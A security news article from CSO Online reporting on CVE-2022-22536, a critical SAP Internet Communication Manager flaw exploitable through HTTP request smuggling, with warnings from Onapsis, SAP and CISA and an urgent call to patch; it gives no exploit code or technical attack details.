• United States



UK Editor

Major SAP vulnerability requires urgent patch to prevent HTTP request smuggling attacks

Feb 11, 20222 mins
Enterprise ApplicationsVulnerabilities

SAP ICM vulnerability allows theft of credentials and session information, which can be used to launch ransomware and steal sensitive data.

skull and crossbones in binary code
Credit: Thinkstock

Security researchers, enterprise software maker SAP, and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have issued warnings over a critical vulnerability affecting Internet Communication Manager (ICM), a core component of SAP business applications that enables HTTPS communications. Tracked as CVE-2022-22536, the vulnerability allows attackers to use malformed packets to trick SAP servers into exposing sensitive data without needing to authenticate, according to Onapsis Research Labs. A security patch is available and organizations are urged to update as soon as possible.

Exploitation possible via simple HTTP request

In a report, Onapsis stated that the vulnerability can be exploited via an attack known as HTTP request smuggling, which can be used to steal credentials and session information from unpatched SAP servers even if servers are placed behind proxies. “A simple HTTP request, indistinguishable from any other valid message and without any kind of authentication, is enough for a successful exploitation,” it added.

A post on SAP’s website confirmed the severity of the issue, which was announced at the same time as two other, less serious SAP vulnerabilities tracked as CVE-2022-22532 and CVE-2022-22533. “If your organization’s program was exploited, these vulnerabilities, a.k.a. “ICMAD,” will enable attackers to execute serious malicious activity on SAP users, business information, and processes,” SAP said.

Security patch available, ransomware and data theft among exploit risks

SAP released a security patch for CVE-2022-22536 on February 9, and while the firm stated it is not aware of any related customer breaches, businesses should update SAP applications as soon as possible due to the vast use of the vulnerable component and potential for exploitation. “As we have observed through recent threat intelligence, threat actors are actively targeting business-critical applications like SAP and have the expertise and tools to carry out sophisticated attacks,” commented Mariano Nunez, Onapsis CEO and co-founder.

CISA warned that impacted organizations could experience theft of sensitive data, financial fraud, disruption of mission-critical business processes, ransomware, and halt of operations if targeted.

UK Editor

Michael Hill is the UK editor of CSO Online. He has spent the past 8 years covering various aspects of the cybersecurity industry, with particular interest in the ever-evolving role of the human-related elements of information security. A keen storyteller with a passion for the publishing process, he enjoys working creatively to produce media that has the biggest possible impact on the audience.

More from this author